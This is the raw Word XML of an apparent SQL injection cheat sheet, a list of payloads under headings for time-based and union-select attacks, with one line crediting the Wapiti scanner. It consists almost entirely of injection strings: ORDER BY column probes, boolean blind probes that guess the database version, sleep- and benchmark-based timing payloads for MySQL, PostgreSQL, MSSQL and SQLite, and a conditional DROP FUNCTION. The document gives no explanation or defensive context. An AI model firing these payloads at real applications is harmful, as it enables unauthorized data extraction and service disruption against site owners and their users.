      </w:r>
    </w:p>
    <w:p w14:paraId="617E47B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11-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44916E4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12-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4061E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13-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F79E2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14-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BE8F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15-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5CDB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16-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD1818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17-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362092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18-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53060E7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19-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6590E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20-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15756F3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21-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538AE1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22-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C17D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23-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AAE79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24-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882B7D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25-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D45B6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26-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C22D4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27-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5071A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28-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F252AF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ORDER BY 29-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED92D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30-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827A89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31337-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B51D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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF8CA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3E41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3# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4511549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4# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E7EF3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5# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0E53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6# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5B5A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7# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4546EFF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8# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D70627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9# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F697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10# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FDF77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11# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570A4B3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12# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5754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13# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0B98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14# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FB15C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15# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267EB4E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16# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDE9D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17# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732FB4B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18# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835B13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19# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD77A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20# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144439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21# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E1F6B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22# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C26B7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23# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0F19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24# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62283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25# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAECE4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26# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D62E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27# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836EB7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28# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF30D2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29# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BF5A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30#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C87E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31337#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A974AA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918452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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5322E56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3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8802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4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E863A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5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843ECA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ORDER BY 6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA036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7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C2611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8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A145A5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9 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9D75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10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527702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11 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507A8C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12 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2646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13 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532D7A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14 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86F9E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15 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E0F8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16 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16642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17 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0C987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18 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141C97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19 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB024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20 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F3E13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21 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E130F0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22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33A36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23 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FB06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24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF5C6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25 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B88DF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26 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C3A7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27 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCB8D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28 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC95A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29 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467123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30 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133D32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31337 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3857F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RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893353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RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D1EF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IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A25C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IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A99005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AND 8310=8310 AND '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADEAE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AND 8310=8311 AND '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19AB1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(select substring(@@version,1,1))='X'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC4440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(select substring(@@version,1,1))='M'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10738C4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(select substring(@@version,2,1))='i'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD851E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(select substring(@@version,2,1))='y'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA34B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(select substring(@@version,3,1))='c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5687F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(select substring(@@version,3,1))='S'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9C21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(select substring(@@version,3,1))='X'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018836F7" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Generic Time Based SQL Injection Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B15B3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from wapiti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04999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sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784B73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 sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09752A3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sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1887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sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E6E6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sleep(5)="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DCEB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sleep(5)='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75901AE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 sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464A9E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sleep(5)="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7776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sleep(5)='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290CC53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 sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6D98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sleep(5)="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03BDE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sleep(5)='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309900B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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC3B7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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684375F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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1258A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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE0E90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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38584E8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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9E95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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130A577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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA89C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'0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B13B84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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91961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 benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02370A4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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14931D0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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACDE62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 benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802FE4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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E26FF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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE462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 benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205FD7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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD99A2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benchmark(10000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC389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pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13D1F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 pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A09A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pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0041B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pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE6470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 pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640865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or pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E1EB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pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9DBA1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 or pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8A2C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pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D897C6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pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E75E8D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(SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7231C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(SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECAFE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(SELECT * FROM (SELECT(SLEEP(5)))nQIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25207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(SELECT * FROM (SELECT(SLEEP(5)))nQIP)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C20A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(SELECT * FROM (SELECT(SLEEP(5)))nQIP)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D2D7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SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6DC3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SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A1E1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SLEEP(5)="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B412D7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SLEEP(5)='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A61F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SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DD11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SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B69A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SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B1D12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SLEEP(5)="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1FE6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SLEEP(5)='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56791CC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'00:00:05'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F516E4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'00:00:05'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FFB8C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waitfor delay '00:00:05'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FE22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benchmark(50000000,MD5(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7335B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benchmark(50000000,MD5(1))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFFDE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benchmark(50000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C53A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benchmark(50000000,MD5(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1BAC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benchmark(50000000,MD5(1))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15275C5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benchmark(50000000,MD5(1))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220DDBE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pg_SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA218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pg_SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A443F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pg_SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0C02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pg_SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68C5C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pg_SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407837D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pg_SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F01FC3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6A35485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SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924BED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SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB2A4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SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450F71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&amp;&amp;SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125559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&amp;&amp;SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7051B9C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&amp;&amp;SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51EAE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AnD SLEEP(5) ANd '1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD7C7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'&amp;&amp;SLEEP(5)&amp;&amp;'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C547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ORDER BY SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92444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ORDER BY SLEEP(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595173B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ORDER BY SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D00D5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(SELECT * FROM (SELECT(SLEEP(5)))ecMj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D8E3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(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236691C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(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2598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+benchmark(3200,SHA1(1))+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C62582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SLEEP(10) + '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DCB98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RANDOMBLOB(500000000/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5E5A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2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140721D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2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A8F79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RANDOMBLOB(1000000000/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D300DB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AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578AEAA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2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758622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SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA646F" w14:textId="77777777" w:rsidR="00B51AE2" w:rsidRPr="00B51AE2" w:rsidRDefault="00B51AE2" w:rsidP="00B51AE2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="360" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51AE2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generic Union Select Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABD03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SLEEP(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23608CC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0669B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73136C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3AFE5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313CC6C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A33C8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2854E3C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB304A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC5B5A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6E31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1F8E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46040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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514E85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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22381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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF503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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6945BAE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320171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ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122D22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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE410B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B62C08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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681F3A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C64D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736587E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191AEC0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCA26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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350150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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32446B5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5C2D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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1913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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CF1A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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE70B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SLEEP(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27965A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13C6B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1,SLEEP(5),3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB4CE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1,SLEEP(5),3,4#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781D50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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD6D76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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1213B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038AF4A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9563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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDF6E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188654E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747449A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B8CA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FA0A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812490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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087A99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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82EEB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C8D9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FB82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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B68D77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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F7AA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2156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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EB6F4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2719BA4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ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B554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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD3AD2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6B6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6F17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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062AF94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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A969A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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33476EE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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567787F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SLEEP(5)-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6D61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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1570B46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1,SLEEP(5),3-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC6CC0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1,SLEEP(5),3,4-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D3FB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD24B4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E25E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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FE8B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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830060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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756522C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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4D28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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DB74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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ADBD2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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083EFD4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388554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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C6A9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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D329E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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB827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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C82F1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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3AA3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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565316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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062441B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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8C28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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C44E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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB6BA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D4EB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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2928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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DC5E8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2207F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ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398D37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1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F6622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ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F20B37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749267C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4EF7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582EFC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B36BAA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA38C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764F4A3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w:t>
      </w:r>
    </w:p>
